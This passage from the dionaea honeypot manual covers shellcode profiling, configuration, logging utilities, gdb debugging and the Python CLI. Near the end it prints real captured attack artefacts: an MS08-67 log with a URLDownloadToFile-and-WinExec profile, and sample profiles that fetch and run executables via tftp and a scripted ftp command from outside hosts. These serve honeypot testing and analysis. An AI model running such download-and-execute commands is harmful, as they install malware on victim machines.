2289 profiling is sufficient, the recorded API calls and arguments reveal
2290 enough information to get an idea of the attackers intention and act
2291 upon them. For multi-stage shellcode, where the first exploitation
2292 stage of the shellcode would retrieve a second shellcode from the
2293 attacker, profiling is not sufficient, as we lack the information ‘what
2294 to do’ from the second stage of the shellcode, in this case we need to
2295 make use of shellcode execution. Shellcode execution is basically the
2296 same as shellcode profiling, the only difference is not recording the
2297 api calls, and we allow the shellcode to take certain actions, for
2298 example creating a network connection.
2299
2300 Payloads
2301 Once we have the payload, and the profile, dionaea has to guess the
2302 intention, and act upon it
2303
2304 Shells - bind/connectback
2305 This payload offers a shell (cmd.exe prompt) to the attacker, either by
2306 binding a port and waiting for the attacker to connect to us again, or
2307 by connection to the attacker. In both cases, dionaea offers an cmd.exe
2308 emulation to the attacker, parses the input, and acts upon the input,
2309 usually the instructions download a file via ftp or tftp.
2310
2311 URLDownloadToFile
2312 These shellcodes use the URLDownloadToFile api call to retrieve a file
2313 via http, and execute the retrieved file afterwards
2314
2315 Exec
2316 Making use of WinExec, these shellcode execute a single command which
2317 has to be parsed and processed like the bind/connectback shell shell‐
2318 commands.
2319
2320 Multi Stage Payloads
2321 We never know what the second stage is, therefore libemu is used to
2322 execute the shellcode in the libemu vm.
2323
2325 Once dionaea gained the location of the file the attacker wants it to
2326 downloads from the shellcode, dionaea will try to download the file.
2327 The protocol to downloads files via tftp and ftp is implemented in
2328 python (ftp.py and tftp.py) as part of dionaea, downloading files via
2329 http is done in the curl module - which makes use of libcurl’s awsome
2330 http capabilities. Of course libcurl can run downloads for ftp too, but
2331 the ftp services embedded in malware a designed to work with windows
2332 ftp.exe client, and fail for others.
2333
2335 Once dionaea got a copy of the worm attacking her, we may want to store
2336 the file locally for further analysis, or submit the file to some 3rd
2337 party for further analysis.
2338
2339 dionaea can http/POST the file to several services like CWSandbox, Nor‐
2340 man Sandbox or VirusTotal.
2341
2343 If you want to change the software, it is really important to under‐
2344 stand how it works, therefore please take the time to how it works.
2345 dionaea.conf is the main configuration file, the file controls consists
2346 of sections for:
2347
2348 · logging
2349
2350 · processors
2351
2352 · downloads
2353
2354 · bistreams
2355
2356 · submit
2357
2358 · listen
2359
2360 · modules
2361
2362 logging
2363 The logging section controls … logging, you can specify log domains and
2364 loglevel for different logfiles. As dionaea is pretty … verbose, it is
2365 useful to rotate the logfiles using logrotate.
2366
2367 # logrotate requires dionaea to be started with a pidfile
2368 # in this case -p /opt/dionaea/var/run/dionaea.pid
2369 # adjust the path to your needs
2370 /opt/dionaea/var/log/dionaea*.log {
2371 notifempty
2372 missingok
2373 rotate 28
2374 daily
2375 delaycompress
2376 compress
2377 create 660 root root
2378 dateext
2379 postrotate
2380 kill -HUP `cat /opt/dionaea/var/run/dionaea.pid`
2381 endscript
2382 }
2383
2384 //etc/logrotate.d/dionaea/
2385
2386 modules
2387 downloads specify where to store downloaded malware. bistreams specify
2388 where to store bi-directional streams, these are pretty useful when
2389 debugging, as they allow to replay an attack on ip-level, without mess‐
2390 ing with pcap&tcpreplay, which never worked for me. submit specifies
2391 where to send files to via http or ftp, you can define a new section
2392 within submit if you want to add your own service. listen sets the
2393 addresses dionaea will listen to. The default is all addresses it can
2394 find, this mode is call getifaddrs, but you can set it to manual and
2395 specify a single address if you want to limit it. modules is the most
2396 powerfull section, as it specifies the modules to load, and the options
2397 for each module.
2398
2399 logsql
2400 This section controls the logging to the sqlite database. logsql does
2401 not work when chrooting - python makes the path absolute and fails for
2402 requests after chroot().
2403
2404 logsql requires the directory where the logsql.sqlite file resides to
2405 be writeable by the user, as well as the logsql.sqlite file itself.
2406 So, if you drop user privs, make sure the user you drop to is allowed
2407 to read/write the file and the directory.
2408
2409 chown MYUSER:MYGROUP /var/lib/dionaea -R
2410
2411 To query the logsql database, I recommend looking at the readlogsql‐
2412 tree.py <#readlogsqltree> script, for visualisation the gnuplotsql
2413 <#gnuplotsql> script.
2414
2415 The blog on logsql:
2416
2417 · 2009-11-06 dionaea sql logging
2418
2419 · 2009-12-08 post it yourself
2420
2421 · 2009-12-12 sqlite performance
2422
2423 · 2009-12-14 virustotal fun
2424
2425 · 2009-12-15 paris mission pack avs
2426
2427 · 2010-06-06 data visualisation
2428
2429 logxmpp
2430 This section controls the logging to xmpp services. If you want to use
2431 logxmpp, make sure to enable logxmpp in the ihandler section. Using
2432 logxmpp allows you to share your new collected files with other sensors
2433 anonymously.
2434
2435 The blog on logxmpp:
2436
2437 · 2010-02-10 xmpp backend
2438
2439 · 2010-05-12 xmpp take #2
2440
2441 · 2010-05-15 xmpp take #3
2442
2443 pg_backend <#pg_backend> can be used as a backend for xmpp logging sen‐
2444 sors.
2445
2446 p0f
2447 Not enabled by default, but recommend: the p0f service, enable by
2448 uncommenting p0f in the ihandlers section of the python modules sec‐
2449 tion, and start p0f as suggested in the config. It costs nothing, and
2450 gives some pretty cool, even if outdated, informations about the
2451 attackers operating system, and you can look them up from the sqlite
2452 database, even the rejected connections. If you face problems, here
2453 are some hints.
2454
2455 ihandlers
2456 ihandlers section is used to specify which ihandlers get started by
2457 ihandlers.py . You do not want to miss p0f and logsql.
2458
2459 services
2460 services controls which services will get started by services.py
2461
2463 Dionaea ships with some utils, as these utils are written in python and
2464 rely on the python3 interpreter dionaea requires to operate, this soft‐
2465 ware can be found in modules/python/utils:
2466
2467 readlogsqltree <#readlogsqltree> -
2468 modules/python/readlogsqltree.py
2469
2470 readlogsqltree is a python3 script which queries the logsql sqlite
2471 database for attacks, and prints out all related information for every
2472 attack. This is an example for an attack, you get the vulnerability
2473 exploited, the time, the attacker, information about the shellcode, the
2474 file offered for download, and even the virustotal report for the file:
2475
2476 2010-10-07 20:37:27
2477 connection 483256 smbd tcp accept 10.0.1.11:445 <- 93.177.176.190:47650 (483256 None)
2478 dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2479 dcerpc bind: uuid '7d705026-884d-af82-7b3d-961deaeb179a' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2480 dcerpc bind: uuid '7f4fdfe9-2be7-4d6b-a5d4-aa3c831503a1' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2481 dcerpc bind: uuid '8b52c8fd-cc85-3a74-8b15-29e030cdac16' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2482 dcerpc bind: uuid '9acbde5b-25e1-7283-1f10-a3a292e73676' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2483 dcerpc bind: uuid '9f7e2197-9e40-bec9-d7eb-a4b0f137fe95' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2484 dcerpc bind: uuid 'a71e0ebe-6154-e021-9104-5ae423e682d0' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2485 dcerpc bind: uuid 'b3332384-081f-0e95-2c4a-302cc3080783' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2486 dcerpc bind: uuid 'c0cdf474-2d09-f37f-beb8-73350c065268' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2487 dcerpc bind: uuid 'd89a50ad-b919-f35c-1c99-4153ad1e6075' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2488 dcerpc bind: uuid 'ea256ce5-8ae1-c21b-4a17-568829eec306' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2489 dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
2490 profile: [{'return': '0x7df20000', 'args': ['urlmon'], 'call': 'LoadLibraryA'}, {'return': '0', 'args': ['', 'http://208.53.183.158/m.exe', '60.exe', '0', '0'], 'call': 'URLDownloadToFile'}, {'return': '32', 'args': ['60.exe', '895'], 'call': 'WinExec'}, {'return': '0', 'args': ['-1'], 'call': 'Sleep'}]
2491 offer: http://208.53.183.158/m.exe
2492 download: 3eab379ddac7d80d3e38399fd273ddd4 http://208.53.183.158/m.exe
2493 virustotal 2010-10-07 04:59:07 5/38 (13%) http://www.virustotal.com/file-scan/report.html?id=265e39edcba9d9004451601544e625f2d3d04f837d0aaf1f8464cb2c819c1939-1286420347
2494 names 'High Risk Fraudulent Security Program' 'Suspicious file' 'Trojan.DownLoader1.27100' 'Worm.Win32.Rimecud' 'Worm:Win32/Rimecud.B'
2495
2496 To create such report for your own honeypots activities for the last 24
2497 hours run:
2498
2499 ./readlogsqltree.py -t $(date '+%s')-24*3600 /var/lib/dionaea/logsql.sqlite
2500
2501
2502 gnuplotsql <#gnuplotsql> - modules/python/gnuplotsql.py
2503
2504 gnuplotsql is a very slow python3 script which runs some queries on the
2505 logsql <#logsql> sqlite database and creates graphs with gnuplot of the
2506 data, stores them on disk and creates an index of the data. The images
2507 are per protocol and look like this: Overview for dionaea smbd. Here
2508 <gnuplotsql> is how the whole thing looks like. To create such images
2509 of your own data, run:
2510
2511 ./gnuplotsql.py -d /var/lib/dionaea/logsql.sqlite -p smbd -p epmapper -p mssqld -p httpd -p ftpd
2512
2513 The blog got something on gnuplotsql as well:
2514
2515 · 2010-12-05 sudden death
2516
2517 · 2010-10-01 Infosanity’s Blog: gnuplotsql.py
2518
2519 · 2010-09-19 gnuplotsql
2520
2521 pg_backend <#pg_backend> - modules/python/xmpp/pg_backend.py
2522
2523 pg_backend is the backend for logxmpp <#logxmpp>, currently it is a
2524 python2.x script which uses pyxmpp to access the xmpp service. It
2525 parses the messages received and can store the events in a postgres
2526 database and the received files on disk. pg_backend requires an xmpp
2527 account:
2528
2529 /without db/
2530 ./pg_backend.py -U USER@sensors.carnivore.it -P XMPPPASS -M dionaea.sensors.carnivore.it -C anon-files -C anon-events -f /tmp/
2531
2532 /with db/
2533 create database
2534
2535 psql ...
2536
2537 start backend
2538
2539 ./pg_backend.py -U USER@sensors.carnivore.it -P XMPPPASS -M dionaea.sensors.carnivore.it -C anon-files -C anon-events -s DBHOST -u DBUSER -d xmpp -p DBPASS -f /tmp/
2540
2542 In case you experience a segfault, you will see something like this:
2543
2544 This is the end. This software just had a segmentation fault. The bug
2545 you encountered may even be exploitable. If you want to assist in fix‐
2546 ing the bug, please send the backtrace below to nepenthesdev@gmail.com.
2547 You can create better backtraces with gdb, for more information visit
2548 http://dionaea.carnivore.it/#segfault Once you read this message, your
2549 tty may be broken, simply type reset, so it will come to life again:
2550
2551 /opt/dionaea/bin/dionaea(sigsegv_backtrace_cb+0x20)[0x805c11e]
2552 [0x70d420]
2553 /opt/dionaea/lib/libemu/libemu.so.2(emu_env_w32_eip_check+0x94)[0x186974]
2554 /opt/dionaea/lib/dionaea/emu.so(run+0x39)[0x89cced]
2555 /opt/dionaea/lib/dionaea/emu.so(profile+0xbb)[0x89db88]
2556 /opt/dionaea/lib/dionaea/emu.so(proc_emu_on_io_in+0x1e1)[0x89bfc5]
2557 /opt/dionaea/bin/dionaea(recurse_io_process+0x31)[0x805df4a]
2558 /opt/dionaea/bin/dionaea(processors_io_in_thread+0x85)[0x805e08d]
2559 /opt/dionaea/bin/dionaea(threadpool_wrapper+0x2e)[0x805c99a]
2560 /opt/dionaea/lib/libglib-2.0.so.0[0xaa9498]
2561 /opt/dionaea/lib/libglib-2.0.so.0[0xaa7a2f]
2562 /lib/libpthread.so.0[0xd8973b]
2563 /lib/libc.so.6(clone+0x5e)[0x2b3cfe]
2564
2565 While the backtrace itself gives an idea what might be wrong, it does
2566 not fix the problem. To fix the problem, the logfiles usually help, as
2567 dionaea is very verbose by default. Below are some hints how to get
2568 started with debugging, click here <#support> for assistance.
2569
2570 debugging
2571
2573 Valgrind does a great job, here is how I use it:
2574
2575 valgrind -v --leak-check=full --leak-resolution=high --show-reachable=yes \
2576 --log-file=dionaea-debug.log /opt/dionaea/bin/dionaea --my-dionaea-options
2577
2578
2579 gdb
2580
2581
2582 logfile assisted
2583
2584 For the above example, I was able to scrape the shellcode from the log‐
2585 file, and run it in libemu, without involving dionaea at all, reducing
2586 the problem:
2587
2588 gdb /opt/dionaea/bin/sctest
2589 (gdb) run -S -s 10000000 -g < sc.bin
2590 Starting program: /media/sda4/opt64/dionaea/bin/sctest -S -s 10000000 -g < sc.bin
2591
2592 Once it crashed, I retrieved a full backtrace:
2593
2594 Program received signal SIGSEGV, Segmentation fault.
2595 env_w32_hook_GetProcAddress (env=0x629a30, hook=<value optimized out>) at environment/win32/env_w32_dll_export_kernel32_hooks.c:545
2596 545 struct emu_env_hook *hook = (struct emu_env_hook *)ehi->value;
2597
2598 (gdb) bt full
2599 #0 env_w32_hook_GetProcAddress (env=0x629a30, hook=<value optimized out>) at environment/win32/env_w32_dll_export_kernel32_hooks.c:545
2600 dll = 0x6366f0
2601 ehi = <value optimized out>
2602 hook = <value optimized out>
2603 c = 0x611180
2604 mem = <value optimized out>
2605 eip_save = <value optimized out>
2606 module = 2088763392
2607 p_procname = 4289925
2608 procname = <value optimized out>
2609 #1 0x00007ffff7b884fb in emu_env_w32_eip_check (env=0x629a30) at environment/win32/emu_env_w32.c:306
2610 dll = <value optimized out>
2611 ehi = <value optimized out>
2612 hook = 0x64c5b0
2613 eip = <value optimized out>
2614 #2 0x0000000000403995 in test (e=0x60f0e0) at sctestmain.c:277
2615 hook = 0xe2
2616 ev = 0x0
2617 iv = <value optimized out>
2618 cpu = 0x611180
2619 mem = <value optimized out>
2620 env = 0x629a30
2621 na = <value optimized out>
2622 j = 7169
2623 last_vertex = 0x0
2624 graph = 0x0
2625 eh = 0x0
2626 ehi = 0x0
2627 ret = <value optimized out>
2628 eipsave = 2088807840
2629 #3 0x00000000004044e4 in main (argc=5, argv=0x7fffffffe388) at sctestmain.c:971
2630 e = <value optimized out>
2631
2632 In this case, the problem was a bug in libemu.
2633 gdb dump memory
2634
2635 Once again, it broke, and we got a backtrace:
2636
2637 #0 0xb70b0b57 in emu_queue_enqueue (eq=0xb3da0918, data=0x4724ab) at emu_queue.c:63
2638 eqi = (struct emu_queue_item *) 0x0
2639 #1 0xb70b15d1 in emu_shellcode_run_and_track (e=0xb4109cd0, data=0xb411c698 "", datasize=<value optimized out>, eipoffset=<value optimized out>,
2640 steps=256, etas=0xb410cd60, known_positions=0xb3d7a810, stats_tested_positions_list=0xb3da3bf0, brute_force=true) at emu_shellcode.c:408
2641 current_pos_ti_diff = (struct emu_tracking_info *) 0x88c3c88
2642 current_pos_ht = <value optimized out>
2643 current_pos_v = <value optimized out>
2644 current_pos_satii = (struct emu_source_and_track_instr_info *) 0xb407e7f8
2645 bfs_queue = (struct emu_queue *) 0xb3e17668
2646 ret = 4662443
2647 eipsave = <value optimized out>
2648 hook = <value optimized out>
2649 j = 4
2650 es = <value optimized out>
2651 eli = (struct emu_list_item *) 0xb3e17658
2652 cpu = (struct emu_cpu *) 0xb4109ab0
2653 mem = (struct emu_memory *) 0xb410c3a0
2654 eq = (struct emu_queue *) 0xb3da0918
2655 env = (struct emu_env *) 0xb3e10208
2656 eli = (struct emu_list_item *) 0x4724ab
2657 #2 0xb70b1a2a in emu_shellcode_test (e=0xb4109cd0, data=0xb411c698 "", size=<value optimized out>) at emu_shellcode.c:546
2658 es = (struct emu_stats *) 0xb3d92b28
2659 new_results = (struct emu_list_root *) 0xb3da3bf0
2660 offset = <value optimized out>
2661 el = (struct emu_list_root *) 0xb4100510
2662 etas = (struct emu_track_and_source *) 0xb410cd60
2663 eh = (struct emu_hashtable *) 0xb3d7a810
2664 eli = (struct emu_list_item *) 0xb3d92b40
2665 results = (struct emu_list_root *) 0xb3d82850
2666 es = <value optimized out>
2667 __PRETTY_FUNCTION__ = "emu_shellcode_test"
2668 #3 0xb712140c in proc_emu_on_io_in (con=0x8864b58, pd=0x87dc388) at detect.c:145
2669 e = (struct emu *) 0xb4109cd0
2670 ctx = (struct emu_ctx *) 0x87a2400
2671 offset = 14356
2672 streamdata = (void *) 0xb411c698
2673 size = 8196
2674 ret = 0
2675 __PRETTY_FUNCTION__ = "proc_emu_on_io_in"
2676 #4 0x0805e8be in recurse_io_process (pd=0x87dc388, con=0x8864b58, dir=bistream_in) at processor.c:167
2677 No locals.
2678 #5 0x0805ea01 in processors_io_in_thread (data=0x8864b58, userdata=0x87dc388) at processor.c:197
2679 con = (struct connection *) 0x8864b58
2680 pd = (struct processor_data *) 0x87dc388
2681 __PRETTY_FUNCTION__ = "processors_io_in_thread"
2682 #6 0x0805d2da in threadpool_wrapper (data=0x87d7bd0, user_data=0x0) at threads.c:49
2683 t = (struct thread *) 0x87d7bd0
2684 timer = (GTimer *) 0xb4108540
2685 #7 0xb77441f6 in g_thread_pool_thread_proxy (data=0x83db460) at gthreadpool.c:265
2686 task = (gpointer) 0x87d7bd0
2687 pool = (GRealThreadPool *) 0x83db460
2688 #8 0xb7742b8f in g_thread_create_proxy (data=0x83dc7d0) at gthread.c:635
2689 __PRETTY_FUNCTION__ = "g_thread_create_proxy"
2690 #9 0xb76744c0 in start_thread () from /lib/i686/cmov/libpthread.so.0
2691 No symbol table info available.
2692 #10 0xb75f36de in clone () from /lib/i686/cmov/libc.so.6
2693 No symbol table info available.
2694
2695 Again, it was a bug in libemu, an unbreakable loop consuming all mem‐
2696 ory. To reproduce, we have to dump the tested buffer, therefore we
2697 need the buffers address and size. Luckily the size is noted in frame
2698 #2 as 8196 and and the data address is a parameter which got not opti‐
2699 mized out for frame #2:
2700
2701 dump binary memory /tmp/sc.bin 0xb411c698 0xb411e89c
2702
2703 Afterwards, debugging libemu by feeding the data into sctest is easy.
2704
2705 I’ve had fun with objgraph and gdb debugging reference count leaks in
2706 python too, here <http://carnivore.it/2009/12/23/arcane_bugs> is the
2707 writeup:
2708
2709 gdb python3 embedded
2710
2711 Sometimes, there is something wrong with the python scripts, but gdb
2712 does not provide any useful output:
2713
2714 bt full
2715 #12 0xb765f12d in PyEval_EvalFrameEx (f=0x825998c, throwflag=0) at Python/ceval.c:2267
2716 stack_pointer = (PyObject **) 0x8259af0
2717 next_instr = (unsigned char *) 0x812fabf "m'"
2718 opcode = 100
2719 oparg = <value optimized out>
2720 why = 3071731824
2721 err = 1
2722 x = (PyObject *) 0xb7244aac
2723 v = <value optimized out>
2724 w = (PyObject *) 0xadb5e4dc
2725 u = (PyObject *) 0xb775ccb0
2726 freevars = (PyObject **) 0x8259af0
2727 retval = (PyObject *) 0x0
2728 tstate = (PyThreadState *) 0x809aab0
2729 co = (PyCodeObject *) 0xb717b800
2730 instr_ub = -1
2731 instr_lb = 0
2732 instr_prev = -1
2733 first_instr = (unsigned char *) 0x812f918 "t"
2734 names = (PyObject *) 0xb723f50c
2735 consts = (PyObject *) 0xb71c9f7c
2736 opcode_targets = {0xb765d202, 0xb765f60a, 0xb766133a, 0xb76612db, 0xb7661285, 0xb7661222, 0xb765d202, 0xb765d202, 0xb765d202, 0xb76611dd,
2737 0xb766114b, 0xb76610b9, 0xb766100f, 0xb765d202, 0xb765d202, 0xb7660f7d, 0xb765d202, 0xb765d202, 0xb765d202, 0xb7660eb7, 0xb7660dfb, 0xb765d202,
2738 0xb7660d30, 0xb7660c65, 0xb7660ba9, 0xb7660aed, 0xb7660a31, 0xb7660975, 0xb76608b9, 0xb76607fd, 0xb765d202 <repeats 24 times>, 0xb7660736, 0xb766066b,
2739 0xb76605af, 0xb76604f3, 0xb765d202, 0xb7660437, 0xb766035d, 0xb76602ad, 0xb7661aba, 0xb76619fe, 0xb7661942, 0xb7661886, 0xb7661b76, 0xb76614a8,
2740 0xb7661413, 0xb766138e, 0xb766171f, 0xb76616e6, 0xb765d202, 0xb765d202, 0xb765d202, 0xb766162a, 0xb766156e, 0xb76601f1, 0xb7660135, 0xb76617ca,
2741 0xb7660120, 0xb765fff7, 0xb765d202, 0xb765fd72, 0xb765fc6e, 0xb765d202, 0xb765fc1d, 0xb765fe17, 0xb765fd90, 0xb765fec0, 0xb765fb41, 0xb765fadc,
2742 0xb765f9ed, 0xb765f94d, 0xb765f8be, 0xb765f7e3, 0xb765f779, 0xb765f6bd, 0xb765f66c, 0xb765ef1d, 0xb765eea2, 0xb765ede1, 0xb765ed1a, 0xb765ec35,
2743 0xb765ebc3, 0xb765eb30, 0xb765ea69, 0xb765f1c7, 0xb765f027, 0xb765f560, 0xb765efc1, 0xb76630e3, 0xb766310c, 0xb765e64c, 0xb765e592, 0xb765f49a,
2744 0xb765f3de, 0xb765d202, 0xb765d202, 0xb765f39e, 0xb7663135, 0xb766315f, 0xb765e9cb, 0xb765d202, 0xb765e948, 0xb765e8bb, 0xb765e817, 0xb765d202,
2745 0xb765d202, 0xb765d202, 0xb765d2ae, 0xb765e3e0, 0xb7663275, 0xb765e1a2, 0xb766324e, 0xb765e0ba, 0xb765e01e, 0xb765df74, 0xb765d202, 0xb765d202,
2746 0xb7663189, 0xb76631d3, 0xb7663220, 0xb765e149, 0xb765d202, 0xb765de09, 0xb765dec0, 0xb765f2c0, 0xb765d202 <repeats 108 times>}
2747 #13 0xb7664ac0 in PyEval_EvalCodeEx (co=0xb717b800, globals=0xb7160b54, locals=0x0, args=0x84babb8, argcount=9, kws=0x0, kwcount=0, defs=0xb719e978,
2748 defcount=1, kwdefs=0x0, closure=0x0) at Python/ceval.c:3198
2749 f = (PyFrameObject *) 0x825998c
2750 retval = <value optimized out>
2751 freevars = (PyObject **) 0x8259af0
2752 tstate = (PyThreadState *) 0x809aab0
2753 x = <value optimized out>
2754 u = <value optimized out>
2755
2756 Luckily python3 ships with some gdb macros, which assist in dealing
2757 with this mess. You can grab them over here <‐
2758 http://svn.python.org/view/python/tags/r311/Misc/gdbinit?view=markup>,
2759 place them to ~/.gdbinit, where ~ is the homedirectory of the user
2760 dionaea runs as. If you get /warning: not using untrusted file
2761 “/home/user/.gdbinit”/ you are running gdb via sudo, and the file
2762 /home/user/.gdbinit has to be owned by root. If you are running as
2763 root, and you get /Program received signal SIGTTOU, Stopped (tty out‐
2764 put)./, run stty -nostop before running gdb, reattach the process with
2765 fg, close gdb properly, and start over.
2766
2767 Once you got the macros loaded properly at gdb startup, set a break‐
2768 point on PyEval_EvalFrameEx after dionaea loaded everything:
2769
2770 break PyEval_EvalFrameEx
2771
2772 Then we have some useful macros for gdb:
2773
2774 up
2775 pyframev
2776
2777 pyframev combines the output of pyframe and pylocals.
2778
2779 Be aware you can segfault dionaea now from within gdb, going up, out of
2780 the python call stack and calling some of the macros can and in most
2781 cases will segfault dionaea, therefore use backtrace to make sure you
2782 are still within valid frames. We can’t use pystack or pystackv as
2783 they rely on Py_Main, which is an invalid assumption for embedded
2784 python.
2785
2787 dionaea embedds a python interpreter, and can offer a python cli there‐
2788 fore too. The python cli is blocking, if you start entering a command,
2789 the whole process will wait for you to finish it, and not accept any
2790 new connections. You can use the python cli to interact with dionaea,
2791 which is very useful for development and debugging.
2792
2793 Configuration
2794 You can access the dionaea.conf via python (readonly):
2795
2796 from dionaea import g_dionaea
2797 g_dionaea.config()
2798
2799 Completition and History on the CLI
2800 If you use the cli often, you can make it behave like a real shell,
2801 including history and completition.:
2802
2803 import rlcompleter, readline
2804 readline.parse_and_bind('tab: complete')
2805
2806 Triggering Downloads
2807 Sometimes it helps to trigger a download, without waiting for an
2808 attack. Very useful if you want to verify permissions are correct when
2809 switching the user, or making sure a submission to a 3rd party works
2810 correctly. You can trigger downloads for all major protocols.
2811
2812 ftp
2813 from dionaea.ftp import ftp
2814 f = ftp()
2815 f.download(None, 'anonymous','guest','ftp.kernel.org',21, 'welcome.msg', 'binary','ftp://ftp.kernel.org/welcome.msg')
2816
2817 tftp
2818 from dionaea.tftp import TftpClient
2819 t = TftpClient()
2820 t.download(None, 'tftp.example.com', 69, 'filename')
2821
2822 http
2823 As the http download is not done in python, we do not use the download
2824 facility directly, but create an incident, which will trigger the down‐
2825 load:
2826
2827 from dionaea.core import incident
2828 i = incident("dionaea.download.offer")
2829 i.set("url", "http://www.honeynet.org")
2830 i.report()
2831
2832 incidents
2833 incidents are the ipc used in dionaea.
2834
2835 dumping
2836 from dionaea.core import ihandler
2837 class idumper(ihandler):
2838 def __init__(self, pattern):
2839 ihandler.__init__(self, pattern)
2840 def handle(self, icd):
2841 icd.dump()
2842
2843 a = idumper('*')
2844
2845 emu profile
2846 Small collection of various shellcode profiles gatherd from dionaea.
2847
2848 CreateProcess Commands
2849 This profile will trigger a download via tftp.
2850
2851 p='[{"call": "CreateProcess", "args": ["", "tftp.exe -i 92.17.46.208 get ssms.exe", "", "", "1", "40", "", "", {"dwXCountChars": "0", "dwFillAttribute": "0", "hStdInput": "0", "dwYCountChars": "0", "cbReserved2": "0", "cb": "0", "dwX": "0", "dwY": "0", "dwXSize": "0", "lpDesktop": "0", "hStdError": "68", "dwFlags": "0", "lpReserved": "0", "lpReserved2": "0", "hStdOutput": "0", "lpTitle": "0", "dwYSize": "0", "wShowWindow": "0"}, {"dwProcessId": "4712", "hProcess": "4711", "dwThreadId": "4714", "hThread": "4712"}], "return": "-1"}, {"call": "CreateProcess", "args": ["", "ssms.exe", "", "", "1", "40", "", "", {"dwXCountChars": "0", "dwFillAttribute": "0", "hStdInput": "0", "dwYCountChars": "0", "cbReserved2": "0", "cb": "0", "dwX": "0", "dwY": "0", "dwXSize": "0", "lpDesktop": "0", "hStdError": "68", "dwFlags": "0", "lpReserved": "0", "lpReserved2": "0", "hStdOutput": "0", "lpTitle": "0", "dwYSize": "0", "wShowWindow": "0"}, {"dwProcessId": "4712", "hProcess": "4711", "dwThreadId": "4714", "hThread": "4712"}], "return": "-1"}, {"call": "ExitThread", "args": ["0"], "return": "0"}]'
2852 from dionaea.core import incident
2853 i = incident("dionaea.module.emu.profile")
2854 i.set("profile", str(p))
2855 i.report()
2856
2857 URLDownloadToFile
2858 This profile will trigger a download.
2859
2860 p='[{"call": "LoadLibraryA", "args": ["urlmon"], "return": "0x7df20000"}, {"call": "URLDownloadToFile", "args": ["", "http://82.165.32.34/compiled.exe", "47.scr", "0", "0"], "return": "0"}, {"call": "WinExec", "args": ["47.scr", "895"], "return": "32"}]'
2861 from dionaea.core import incident
2862 i = incident("dionaea.module.emu.profile")
2863 i.set("profile", str(p))
2864 i.report()
2865
2866 WinExec Commands
2867 This profile uses WinExec to create a command file for windows ftp
2868 client, downloads a file, and executes the file.:
2869
2870 p='[{"call": "WinExec", "args": ["cmd /c echo open welovewarez.com 21 > i&echo user wat l0l1 >> i &echo get SCUM.EXE >> i &echo quit >> i &ftp -n -s:i &SCUM.EXE\\r\\n", "0"], "return": "32"}, {"call": "ExitThread", "args": ["0"], "return": "0"}]'
2871 from dionaea.core import incident
2872 i = incident("dionaea.module.emu.profile")
2873 i.set("profile", str(p))
2874 i.report()
2875
2876 · genindex
2877
2878 · modindex
2879
2880 · search
2881
2883 dionaea
2884
2886 2015, dionaea
2887
2888
2889
2890
28910.7.0 Jan 31, 2019 DIONAEA(1)